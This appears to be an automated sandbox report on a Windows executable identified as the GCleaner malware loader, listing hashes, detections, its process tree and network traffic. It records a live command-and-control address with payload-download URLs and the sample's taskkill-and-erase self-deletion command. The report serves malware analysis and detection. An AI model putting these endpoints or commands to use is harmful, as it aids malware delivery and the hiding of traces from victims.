Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64 arch:x86 image:win11-20240802-en locale:en-us os:windows11-21h2-x64 system
  • submitted
    08/09/2024, 00:17 UTC

General

  • Target

    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe

  • Size

    295KB

  • MD5

    f82c9413e07313056c13db265b4ff06d

  • SHA1

    80c856b004083ebe777a7c4030d247d26cd7dc40

  • SHA256

    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e

  • SHA512

    3accbff6cc6f3fd95a14a687920aad9053fdcf01bebc911b975fa5b718b685bb88cc5a7efcb05ab7b7f7e74d358d0728ecc0478ddc5b5d8b1455619e6c8eb921

  • SSDEEP

    6144:U6VyfXc9rZniLw7BUDJ5/kDQwgxAu/w/Q:U9XurZniemXwgxAuY/

Malware Config

Extracted

Family

gcleaner

C2

80.66.75.114

Signatures

  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    "C:\Users\Admin\AppData\Local\Temp\c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe" & exit
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2844
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im "c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1688

Network

  • flag-ru
    GET
    http://80.66.75.114/add?substr=one&s=two
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /add?substr=one&s=two HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: 1
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:15 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:16 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:18 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=98
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:20 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=97
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:23 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=96
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:25 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=95
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:27 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=94
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:29 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=93
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:31 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=92
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:33 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=91
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:35 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=90
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:37 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=89
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    114.75.66.80.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    114.75.66.80.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • flag-us
    DNS
    nexusrules.officeapps.live.com
    Remote address:
    8.8.8.8:53
    Request
    nexusrules.officeapps.live.com
    IN A
    Response
    nexusrules.officeapps.live.com
    IN CNAME
    prod.nexusrules.live.com.akadns.net
    prod.nexusrules.live.com.akadns.net
    IN A
    52.111.229.19
  • flag-us
    DNS
    19.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    self.events.data.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    self.events.data.microsoft.com
    IN A
    Response
    self.events.data.microsoft.com
    IN CNAME
    self-events-data.trafficmanager.net
    self-events-data.trafficmanager.net
    IN CNAME
    onedscolprdwus20.westus.cloudapp.azure.com
    onedscolprdwus20.westus.cloudapp.azure.com
    IN A
    20.189.173.25
  • flag-us
    DNS
    25.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    25.173.189.20.in-addr.arpa
    IN PTR
    Response
  • 80.66.75.114:80
    http://80.66.75.114/files/download
    http
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    6.8kB
    3.3kB
    29
    21

    HTTP Request

    GET http://80.66.75.114/add?substr=one&s=two

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200
  • 8.8.8.8:53
    114.75.66.80.in-addr.arpa
    dns
    433 B
    870 B
    6
    6

    DNS Request

    114.75.66.80.in-addr.arpa

    DNS Request

    8.8.8.8.in-addr.arpa

    DNS Request

    nexusrules.officeapps.live.com

    DNS Response

    52.111.229.19

    DNS Request

    19.229.111.52.in-addr.arpa

    DNS Request

    self.events.data.microsoft.com

    DNS Response

    20.189.173.25

    DNS Request

    25.173.189.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\I323E2ZQ\download[1].htm

    Filesize

    1B

    MD5

    cfcd208495d565ef66e7dff9f98764da

    SHA1

    b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

    SHA256

    5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

    SHA512

    31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

  • memory/1996-1-0x0000000002D00000-0x0000000002E00000-memory.dmp

    Filesize

    1024KB

  • memory/1996-2-0x00000000049B0000-0x00000000049DD000-memory.dmp

    Filesize

    180KB

  • memory/1996-3-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/1996-8-0x0000000002D00000-0x0000000002E00000-memory.dmp

    Filesize

    1024KB

  • memory/1996-11-0x00000000049B0000-0x00000000049DD000-memory.dmp

    Filesize

    180KB

  • memory/1996-10-0x0000000000400000-0x0000000002B6A000-memory.dmp

    Filesize

    39.4MB

  • memory/1996-13-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/1996-22-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/1996-21-0x0000000000400000-0x0000000002B6A000-memory.dmp

    Filesize

    39.4MB
